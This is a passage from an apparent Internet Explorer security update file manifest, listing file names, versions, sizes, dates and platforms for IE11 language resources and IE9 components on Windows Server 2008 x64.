\nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 06:59| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:00| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:00| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:01| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 08:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:06| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:09| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,936| 23-Nov-2019| 07:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:17| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:18| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:21| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 07:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 07:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:25| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:26| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 06:58| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:59| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:00| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:00| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:01| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 11,264| 23-Nov-2019| 07:02| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:22| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:03| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:04| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:05| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,216| 23-Nov-2019| 07:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 07:09| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 07:10| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:11| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:12| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:13| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:14| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:15| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:17| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:18| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:19| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:19| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:20| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:21| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:22| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:23| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:24| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:24| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:25| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 07:26| Not applicable \nJsproxy.dll| 11.0.9600.19572| 47,104| 19-Nov-2019| 07:53| x86 \nWininet.dll| 11.0.9600.19572| 4,387,840| 19-Nov-2019| 07:05| x86 \nInetcpl.cpl.mui| 11.0.9600.19572| 114,176| 23-Nov-2019| 06:58| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 06:59| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,928| 23-Nov-2019| 07:00| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,880| 23-Nov-2019| 07:00| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,048| 23-Nov-2019| 07:01| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 138,240| 23-Nov-2019| 07:02| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 114,688| 23-Nov-2019| 08:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 131,584| 23-Nov-2019| 07:03| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 117,760| 23-Nov-2019| 07:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,368| 23-Nov-2019| 07:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 134,144| 23-Nov-2019| 07:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 107,008| 23-Nov-2019| 07:06| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 07:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 127,488| 23-Nov-2019| 07:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,512| 23-Nov-2019| 07:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 88,576| 23-Nov-2019| 07:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 82,944| 23-Nov-2019| 07:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 07:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 07:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 120,320| 23-Nov-2019| 07:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 07:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,952| 23-Nov-2019| 07:15| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,000| 23-Nov-2019| 07:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 07:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 23-Nov-2019| 07:20| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 121,856| 23-Nov-2019| 07:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 115,712| 23-Nov-2019| 07:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 07:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 07:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 72,704| 23-Nov-2019| 07:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 07:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 07:26| Not applicable \nIedkcs32.dll| 18.0.9600.19572| 341,896| 23-Nov-2019| 06:57| x86 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 05:36| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 23-Sep-2018| 13:18| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 710,144| 19-Nov-2019| 07:00| x86 \nIedvtool.dll| 11.0.9600.19572| 772,608| 19-Nov-2019| 08:17| x86 \nDiagnosticstap.dll| 11.0.9600.19572| 174,592| 19-Nov-2019| 07:40| x86 \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 06:58| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 06:59| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:00| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:00| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:01| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:02| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:22| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:03| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:04| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:05| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:05| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:06| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:08| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:08| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:09| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:11| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:12| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:13| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:13| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:14| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:15| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:16| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:17| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:18| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:19| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:20| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:21| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:21| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:22| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:23| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:23| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:24| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:25| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:26| Not applicable \nF12tools.dll| 11.0.9600.19572| 255,488| 19-Nov-2019| 07:39| x86 \nHtml.iec| 2019.0.0.19572| 341,504| 19-Nov-2019| 07:58| Not applicable \nIelowutil.exe| 11.0.9600.19572| 221,184| 19-Nov-2019| 07:51| x86 \nIeproxy.dll| 11.0.9600.19572| 301,056| 19-Nov-2019| 06:57| x86 \nIeshims.dll| 11.0.9600.19572| 290,304| 19-Nov-2019| 07:02| x86 \nJsprofilerui.dll| 11.0.9600.19572| 579,584| 19-Nov-2019| 07:34| x86 \nMshtmldac.dll| 11.0.9600.19572| 64,000| 19-Nov-2019| 07:57| x86 \nNetworkinspection.dll| 11.0.9600.19572| 1,075,200| 19-Nov-2019| 07:29| x86 \nIcrav03.rat| Not applicable| 8,798| 23-Sep-2018| 13:27| Not applicable \nMsrating.dll| 11.0.9600.19572| 168,960| 19-Nov-2019| 07:33| x86 \nTicrf.rat| Not applicable| 1,988| 23-Sep-2018| 13:27| Not applicable \nIertutil.dll| 11.0.9600.19572| 2,304,000| 19-Nov-2019| 07:56| x86 \nSqmapi.dll| 6.2.9200.16384| 228,232| 23-Nov-2019| 06:57| x86 \nInseng.dll| 11.0.9600.19572| 91,136| 19-Nov-2019| 07:35| x86 \nVgx.dll| 11.0.9600.19572| 817,664| 19-Nov-2019| 07:33| x86 \nIeframe.dll.mui| 11.0.9600.19572| 2,066,432| 23-Nov-2019| 06:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 06:58| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,120,704| 23-Nov-2019| 06:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 06:59| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 07:00| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,063,360| 23-Nov-2019| 07:01| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,313,728| 23-Nov-2019| 07:02| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:01| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,390,016| 23-Nov-2019| 07:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:02| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,032,640| 23-Nov-2019| 08:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,584| 23-Nov-2019| 07:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:03| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,255,360| 23-Nov-2019| 07:04| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:04| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,061,312| 23-Nov-2019| 07:05| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:05| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,325,504| 23-Nov-2019| 07:06| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:06| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,019,840| 23-Nov-2019| 07:07| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:06| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,070,528| 23-Nov-2019| 07:08| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:07| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,082,304| 23-Nov-2019| 07:08| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:08| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,072| 23-Nov-2019| 07:09| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:09| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 23-Nov-2019| 07:10| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:09| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,153,984| 23-Nov-2019| 07:11| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,291,712| 23-Nov-2019| 07:12| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:11| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,283,520| 23-Nov-2019| 07:12| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:12| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,051,584| 23-Nov-2019| 07:13| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:13| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,301,440| 23-Nov-2019| 07:14| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,093,056| 23-Nov-2019| 07:15| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 07:16| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,298,880| 23-Nov-2019| 07:17| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:16| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,094,080| 23-Nov-2019| 07:17| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:17| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,316,800| 23-Nov-2019| 07:18| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,305,024| 23-Nov-2019| 07:19| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 07:20| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,277,888| 23-Nov-2019| 07:21| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:20| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,059,776| 23-Nov-2019| 07:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:21| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 23-Nov-2019| 07:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 07:23| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,324,480| 23-Nov-2019| 07:24| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 23-Nov-2019| 07:25| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:24| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 07:26| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:25| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 07:26| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:26| Not applicable \nIeinstal.exe| 11.0.9600.19572| 475,648| 19-Nov-2019| 07:31| x86 \nJscript9.dll.mui| 11.0.9600.19572| 29,184| 23-Nov-2019| 06:58| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 06:59| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:00| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 07:02| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:03| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:04| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 27,648| 23-Nov-2019| 07:06| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:08| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:08| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,792| 23-Nov-2019| 07:09| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 23,040| 23-Nov-2019| 07:09| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 22,016| 23-Nov-2019| 07:11| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:11| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:12| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 31,232| 23-Nov-2019| 07:13| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:13| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:15| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:18| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,256| 23-Nov-2019| 07:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:20| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,384| 23-Nov-2019| 07:24| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 07:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 07:26| Not applicable \n \n## Windows Server 2008\n\n## Internet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nUrlmon.dll| 9.0.8112.21392| 1,390,592| 21-Nov-2019| 21:00| x64 \nIexplore.exe| 9.0.8112.21392| 757,664| 21-Nov-2019| 21:24| x64 \nInetcpl.cpl| 9.0.8112.21392| 1,494,528| 21-Nov-2019| 20:59| Not applicable \nJsproxy.dll| 9.0.8112.21392| 97,280| 21-Nov-2019| 20:59| x64 \nWininet.dll| 9.0.8112.21392| 1,394,688| 21-Nov-2019| 21:00| x64 \nWininetplugin.dll| 1.0.0.1| 86,528| 21-Nov-2019| 20:59| x64 \nTdc.ocx| 9.0.8112.21392| 76,800| 21-Nov-2019| 20:58| x64 \nIedvtool.dll| 9.0.8112.21392| 887,808| 21-Nov-2019| 20:59| x64 \nDxtmsft.dll| 9.0.8112.21392| 452,608| 21-Nov-2019| 20:58| x64 \nDxtrans.dll| 9.0.8112.21392| 281,600| 21-Nov-2019| 20:58| x64 \nMsfeeds.dll| 9.0.8112.21392| 729,088| 21-Nov-2019| 20:58| x64 \nMsfeeds.mof| Not applicable| 1,518| 21-Nov-2019| 20:28| Not applicable \nMsfeedsbs.dll| 9.0.8112.21392| 55,296| 21-Nov-2019| 20:58| x64 \nMsfeedsbs.mof| Not applicable| 1,574| 21-Nov-2019| 20:28| Not applicable \nMsfeedssync.exe| 9.0.8112.21392| 11,264| 21-Nov-2019| 20:58| x64 \nMshta.exe| 9.0.8112.21392| 12,800| 21-Nov-2019| 20:58| x64 \nHtml.iec| 2019.0.0.21377| 448,512| 21-Nov-2019| 21:09| Not applicable \nMshtmled.dll| 9.0.8112.21392| 96,256| 21-Nov-2019| 20:58| x64 \nMshtml.dll| 9.0.8112.21392| 18,810,880| 21-Nov-2019| 21:19| x64 \nMshtml.tlb| 9.0.8112.21392| 2,382,848| 21-Nov-2019| 20:58| Not applicable \nIelowutil.exe| 9.0.8112.21392| 223,744| 21-Nov-2019| 20:59| x64 \nIeproxy.dll| 9.0.8112.21392| 550,912| 21-Nov-2019| 20:59| x64 \nIeshims.dll| 9.0.8112.21392| 305,664| 21-Nov-2019| 20:59| x64 \nIeunatt.exe| 9.0.8112.21392| 173,568| 21-Nov-2019| 20:58| x64 \nWindows feed discovered.wav| Not applicable| 19,884| 27-Apr-2018| 17:11| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 27-Apr-2018| 17:11| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 27-Apr-2018| 17:11| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 27-Apr-2018| 17:11| Not applicable \nJsdbgui.dll| 9.0.8112.21392| 499,712| 21-Nov-2019| 20:59| x64 \nIertutil.dll| 9.0.8112.21392| 2,163,200| 21-Nov-2019| 20:59| x64 \nSqmapi.dll| 6.0.6000.16386| 176,032| 21-Nov-2019| 21:24| x64 \nVgx.dll| 9.0.8112.21392| 997,376| 